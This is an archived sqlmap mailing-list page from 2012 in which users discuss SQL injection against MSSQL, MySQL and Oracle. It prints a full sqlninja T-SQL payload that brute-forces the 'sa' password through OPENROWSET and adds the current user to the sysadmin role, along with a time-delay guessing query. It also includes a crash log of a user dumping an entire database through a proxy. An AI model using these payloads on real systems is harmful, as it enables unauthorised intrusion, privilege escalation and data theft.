Hi Juan I'm not convinced it's due to either of your suggestions. If openrowset is disabled, you'll get an error message that begins something like: SQL Server blocked access to STATEMENT 'OpenRowset/OpenDatasource' of component 'Ad Hoc Distributed Queries' because this component is turned off as part of the security configuration for this server. The statement that your instance of SQLNinja is sending out differs from mine (are you using -m b -w /path/to/wordlist.txt)? My queries looks similar to this: select * from OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=sa;pwd=passwordguess','waitfor delay ''0:0:59'';select 1;');-- If the sa password is incorrect, the error message should be along the lines of: Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user 'sa'. If the sa password is correct, then you'll get the appropriate delay and probably a 200 response (though not necessarily, but you'll definitely get the delay). I'm guessing that your error message is something to do with user permissions for the DBMS, a quick Google seemed to suggest that, but I'm confident it has little to do with openrowset being disabled or an incorrect sa password. I assume you have mixed mode authentication in place on SQL Server? You can check if openrowset is enabled using sp_configure, see the following link for more information: http://social.msdn.microsoft.com/Forums/en/transactsql/thread/c3d3295b-933b-4ee8-934c-87c8d6a47260 Sorry to talk about a different SQL injection tool on this list. I would add that it'd be good to see some of the bits of SQLNinja functionality that are missing from SQLMap implemented in the future if it's not already planned (not that there's a lot of missing functionality). Cheers Chris On 24 July 2012 14:26, juan molina <j.m...@gm...> wrote: > I was trying sqlninja. > > this is the query it use for bruteforce SA password with 1 character > (numbers and letters). > > declare @p nvarchar(99),@z nvarchar(10),@s nvarchar(99), @a int, @q > nvarchar (4000) set @a=1 set @s=N'abcdefghijklmnopqrstuvwxyz0123456789' > while @a<37 begin set @p=N'' set @z = substring(@s,@a,1) if @z='''' set > @z='''''' set @p=@p+@z set @q=N'select 1 from > OPENROWSET(''SQLOLEDB'',''Network=DBMSSOCN;Address=;uid=sa;pwd='+@p+N''',''select > 1;exec master.dbo.sp_addsrvrolemember > '''''+system_user+N''''',''''sysadmin'''' '')' exec > master.dbo.xp_execresultset @q,N'master' set @a=@a+1 end set @a=1 > > but I am receiving this error: > > > *Could not find stored procedure 'master.dbo.xp_execresultset'.* > > it was in the HTTP response. this error is because the "openrowset" is > disable? or is just that the "SA" password is not the correct. (like > "password wrong" error). > > there is any way to check if "openrowset" is enable? > > > thanks. > > > > On Fri, Jul 20, 2012 at 5:02 AM, Bernardo Damele A. G. < > ber...@gm...> wrote: > >> Hi Juan, >> >> Microsoft SQL Server has a built-in function called OPENROWSET to >> query another DBMS (or the DBMS itself). Back in 2002 Chris Anley >> released a paper demonstrating how to abuse this function to perform a >> DBMS user's password brute-force attack within the MSSQL instance. A >> few years later the attack has been automated in sqlninja[1]. >> We have an issue open on GitHub[2] to implement the same DBA password >> brute-force attack. We have the required code in place, see issue >> #34[3] and will soon close the whole thing. >> >> However, OPENROWSET is enabled by default on MSSQL 2000. From MSSQL >> 2005 RTM it is disabled by thereforce, hence either the database >> administrator has manually enabled it, or you won't be able to abuse >> this function to brute-force the 'sa' (DBA) password hash or run >> statements on his behalf. >> >> [1] http://sqlninja.sourceforge.net >> [2] https://github.com/sqlmapproject/sqlmap/issues/31 >> [3] https://github.com/sqlmapproject/sqlmap/issues/34 >> >> Regards, >> Bernardo >> >> >> On 20 July 2012 12:14, juan molina <j.m...@gm...> wrote: >> > there is a way for bruteforce the SA password using SQL INJECTION? >> > >> > this is the Scenario. it is a DataBase Server (Sql Server 2008) without >> > access to the internet (it has the 1433 port blocked), >> > the current user is a normal user (low privileges User). cannot get SA >> hash >> > password. >> > >> > the question is, is there any tool or code or way to bruteforce the SA >> > password? without direct access to the Sql Server? >> > >> > It is a request for add this functionality to SQLMAP, I don't know if is >> > possible. >> > >> > Thanks. >> > >> > >> ------------------------------------------------------------------------------ >> > Live Security Virtual Conference >> > Exclusive live event will cover all the ways today's security and >> > threat landscape has changed and how IT managers can respond. >> Discussions >> > will include endpoint security, mobile security and the latest in >> malware >> > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >> > _______________________________________________ >> > sqlmap-users mailing list >> > sql...@li... >> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > >> >> >> >> -- >> Bernardo Damele A. G. >> >> E-mail / Jabber: bernardo.damele (at) gmail.com >> Mobile: +447788962949 (UK 07788962949) >> > > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
From: Miroslav S. <mir...@gm...> - 2012-07-24 22:48:45
|
Hi Troy. More info is required for sure. You mean that you just need a (SELECT...)/subquery type of injection? This is something that we are aware that we need to do. Kind regards, Miroslav Stampar On Jul 24, 2012 11:18 PM, "Troy B" <pow...@gm...> wrote: > Evening all, > > I had an SQL injection into a MySQL5-based web application the other week > which involved me having control over the column list being selected. I > tried sqlmap against the URL, but it didn't find the injection point. I > tried again, taking the --level and --risk a little higher, but still > nothing. > > In the end, I manually exploited it using a sub-select. Was I doing > something wrong with sqlmap, or will it not identify injection points like > that? I can provide an example of the query the application was using if > this helps. > > Regards, > > Matt > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
From: Troy B <pow...@gm...> - 2012-07-24 21:17:38
|
Evening all, I had an SQL injection into a MySQL5-based web application the other week which involved me having control over the column list being selected. I tried sqlmap against the URL, but it didn't find the injection point. I tried again, taking the --level and --risk a little higher, but still nothing. In the end, I manually exploited it using a sub-select. Was I doing something wrong with sqlmap, or will it not identify injection points like that? I can provide an example of the query the application was using if this helps. Regards, Matt |
From: juan m. <j.m...@gm...> - 2012-07-24 13:26:36
|
I was trying sqlninja. this is the query it use for bruteforce SA password with 1 character (numbers and letters). declare @p nvarchar(99),@z nvarchar(10),@s nvarchar(99), @a int, @q nvarchar (4000) set @a=1 set @s=N'abcdefghijklmnopqrstuvwxyz0123456789' while @a<37 begin set @p=N'' set @z = substring(@s,@a,1) if @z='''' set @z='''''' set @p=@p+@z set @q=N'select 1 from OPENROWSET(''SQLOLEDB'',''Network=DBMSSOCN;Address=;uid=sa;pwd='+@p+N''',''select 1;exec master.dbo.sp_addsrvrolemember '''''+system_user+N''''',''''sysadmin'''' '')' exec master.dbo.xp_execresultset @q,N'master' set @a=@a+1 end set @a=1 but I am receiving this error: *Could not find stored procedure 'master.dbo.xp_execresultset'.* it was in the HTTP response. this error is because the "openrowset" is disable? or is just that the "SA" password is not the correct. (like "password wrong" error). there is any way to check if "openrowset" is enable? thanks. On Fri, Jul 20, 2012 at 5:02 AM, Bernardo Damele A. G. < ber...@gm...> wrote: > Hi Juan, > > Microsoft SQL Server has a built-in function called OPENROWSET to > query another DBMS (or the DBMS itself). Back in 2002 Chris Anley > released a paper demonstrating how to abuse this function to perform a > DBMS user's password brute-force attack within the MSSQL instance. A > few years later the attack has been automated in sqlninja[1]. > We have an issue open on GitHub[2] to implement the same DBA password > brute-force attack. We have the required code in place, see issue > #34[3] and will soon close the whole thing. > > However, OPENROWSET is enabled by default on MSSQL 2000. From MSSQL > 2005 RTM it is disabled by thereforce, hence either the database > administrator has manually enabled it, or you won't be able to abuse > this function to brute-force the 'sa' (DBA) password hash or run > statements on his behalf. > > [1] http://sqlninja.sourceforge.net > [2] https://github.com/sqlmapproject/sqlmap/issues/31 > [3] https://github.com/sqlmapproject/sqlmap/issues/34 > > Regards, > Bernardo > > > On 20 July 2012 12:14, juan molina <j.m...@gm...> wrote: > > there is a way for bruteforce the SA password using SQL INJECTION? > > > > this is the Scenario. it is a DataBase Server (Sql Server 2008) without > > access to the internet (it has the 1433 port blocked), > > the current user is a normal user (low privileges User). cannot get SA > hash > > password. > > > > the question is, is there any tool or code or way to bruteforce the SA > > password? without direct access to the Sql Server? > > > > It is a request for add this functionality to SQLMAP, I don't know if is > > possible. > > > > Thanks. > > > > > ------------------------------------------------------------------------------ > > Live Security Virtual Conference > > Exclusive live event will cover all the ways today's security and > > threat landscape has changed and how IT managers can respond. Discussions > > will include endpoint security, mobile security and the latest in malware > > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > > _______________________________________________ > > sqlmap-users mailing list > > sql...@li... > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > -- > Bernardo Damele A. G. > > E-mail / Jabber: bernardo.damele (at) gmail.com > Mobile: +447788962949 (UK 07788962949) > |
From: Zaki A. <zak...@gm...> - 2012-07-24 05:51:23
|
On Mon, Jul 16, 2012 at 11:20 PM, Bernardo Damele A. G. <ber...@gm...> wrote: > Zaki, > > Recently we added switch --hostname to retrieve the database server > hostname. There's no built-in switch to retrieve the IP yet. Hi Bernardo, Actually Miroslav had answered my question: <quote> Hi Zaki. You can try either [1][2]: 1) --sql-query="SELECT UTL_INADDR.GET_HOST_ADDRESS() FROM DUAL" or 2) --sql-query="SELECT SYS_CONTEXT('USERENV', 'IP_ADDRESS', 15) FROM DUAL" ...but don't hope too much because of execute privileges [3] Also, try to use those with --parse-errors to possibly catch some DBMS error information Kind regards, Miroslav Stampar References: [1] http://www.dba-oracle.com/t_get_ip_address_utl_inaddr_sys_context.htm [2] http://docs.oracle.com/cd/B19306_01/appdev.102/b14258/u_inaddr.htm [3] https://forums.oracle.com/forums/thread.jspa?messageID=9755122 </quote> Did --hostname option had implement those sql-query? Regards, -- Zaki Akhmad |
From: Bernardo D. A. G. <ber...@gm...> - 2012-07-22 19:58:19
|
Dusan, you are running a year and a half outdated version of sqlmap. Run the following command: $ git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev and try your run again from sqlmap-dev directory. Bernardo On 22 July 2012 20:52, Dusan Lauko <dus...@gm...> wrote: > [20:02:09] [CRITICAL] unhandled exception in sqlmap/0.9, retry your run > with the > latest development version from the Subversion repository. If the > exception per > sists, please send by e-mail to sql...@li... the > following > text and any information required to reproduce the bug. The developers > will try > to reproduce the bug, fix it accordingly and get back to you. > sqlmap version: 0.9 (r3630) > Python version: 2.7.2 > Operating system: nt > Command line: D:\Anon Hacking\Black Hat\SQLi\SQLmap\SQLmap\sqlmap.py > --proxy=htt > p://186.215.202.163:8080 -u > **************************************************** > ***************** --random-agent --dump-all --exclude-sysdb --eta > Technique: ERROR > Back-end DBMS: MySQL (fingerprinted) > Traceback (most recent call last): > File "D:\Anon Hacking\Black Hat\SQLi\SQLmap\SQLmap\sqlmap.py", line > 82, in mai > n > start() > File "D:\Anon Hacking\Black > Hat\SQLi\SQLmap\SQLmap\lib\controller\controller.p > y", line 447, in start > action() > File "D:\Anon Hacking\Black > Hat\SQLi\SQLmap\SQLmap\lib\controller\action.py", > line 106, in action > conf.dbmsHandler.dumpAll() > File "D:\Anon Hacking\Black > Hat\SQLi\SQLmap\SQLmap\plugins\generic\enumeration > .py", line 1496, in dumpAll > data = self.dumpTable() > File "D:\Anon Hacking\Black > Hat\SQLi\SQLmap\SQLmap\plugins\generic\enumeration > .py", line 1275, in dumpTable > colString = ", ".join(column for column in colList) > TypeError: sequence item 1: expected string or Unicode, NoneType found > > [*] shutting down at: 20:02:09 > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) |